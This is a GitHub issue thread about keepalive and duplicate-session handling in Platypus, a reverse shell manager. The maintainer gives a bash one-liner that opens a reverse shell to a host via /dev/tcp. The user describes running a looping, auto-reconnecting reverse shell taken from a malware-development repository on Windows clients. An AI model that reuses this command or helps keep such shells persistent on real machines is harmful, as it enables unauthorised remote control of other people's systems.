WangYihang/Platypus

KeepAlive option

ariadarkkkis opened this issue · 13 comments

Hi, it would be great to add keepalive to connected sessions.

@ariadarkkkis
Sorry for the late reply.
By default, all connections will stay alive unless the client process is killed.
I am not sure what you mean by keepalive; would you like to elaborate on that?

I'm using code to get a reverse shell, but the problem is if you don't send anything to the client for about 5 minutes I guess (I'm not sure, but definitely more than 2 minutes), the client will disconnect, and because I edited the code and added a loop, it will connect again. And after some time, the client list is like 100 connections from the same IP address, but none of them will connect until I connect to one of them and send something, and then they will reconnect, and after that I have to send something to the client again and then I get the shell running. Even after getting the shell running and sending some commands, if you don't send something to the client within that time I said, it will disconnect again. BTW, I edited the code so it has a 60-second sleep (or timeout) to try to connect to my server again after it disconnected.

And BTW, I have a 1-core, 1 GB RAM VPS, and when there are a lot of clients (which is not a lot, most of them are duplicate clients), after some days, CPU usage on the 1-core CPU will max out at 100%. And I have to kill Platypus and re-run it again.

I guess it should have a keep-alive option in it in case anyone needs it, so it sends some packets to the client every 60 seconds or so, so the client won't disconnect from my server. I'm using Ubuntu 16.04 x64 LTS for running Platypus.

The predecessor of this tool actually had this function, which was able to detect connections from the same IP and kill multiple connections from the same IP, but this function was removed due to possible NAT and port forwarding. You are right, I am thinking about whether I need to add the feature to kill connections from the same IP. Maybe make it a server option.
You know, due to the complexity of different operating systems and different shells, it is very difficult to detect whether a connection is from the same real host. Therefore, we have to use the IP to uniquely identify a host. I don't know if this identifier is reasonable.

How do you create the reverse shell session? Did you try to use bash commands like this?

bash -c 'bash >/dev/tcp/1.2.3.4/4444 0>&1 &'

You can use hostname as an identifier or maybe add something like an identifier in a custom reverse shell like the one I gave you above. So the user can manually set the identifier or it gets the hostname and some other information like CPU and OS and something and make a hash out of them to make it unique.

@WangYihang It broke my VPS. As I said before, after some days, the CPU load on the 1-core VPS will max out. I forgot to restart Platypus and now my VPS has broken.

@ariadarkkkis Solved by @zxyxx, appreciate his excellent work!

@zxyxx @WangYihang Can you make it replace a new connection from the same IP with the old one? Like if a client with IP 1.2.3.4 connected 10 minutes ago and it sends another session now from the same IP, Platypus replaces the new session with the old one and removes the old one.

Because I still have this problem that I can't rejoin a session after about 10 minutes, because the session times out. I'm using this as my reverse shell on Windows clients:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

I get this when I try to interact with a session from 30 minutes ago:

2019/03/18 05:37:20 Interacting with [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]
2019/03/18 05:37:20 Read from client failed
2019/03/18 05:37:20 Closing client: [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]

I used jump and then interact with that session. I don't know what the problem is and why the connection doesn't stay alive.

@ariadarkkkis Hey, bro, thank you so much for reporting. Could you please create a new issue to explain this feature request? (One issue for a single problem ~ thank u~)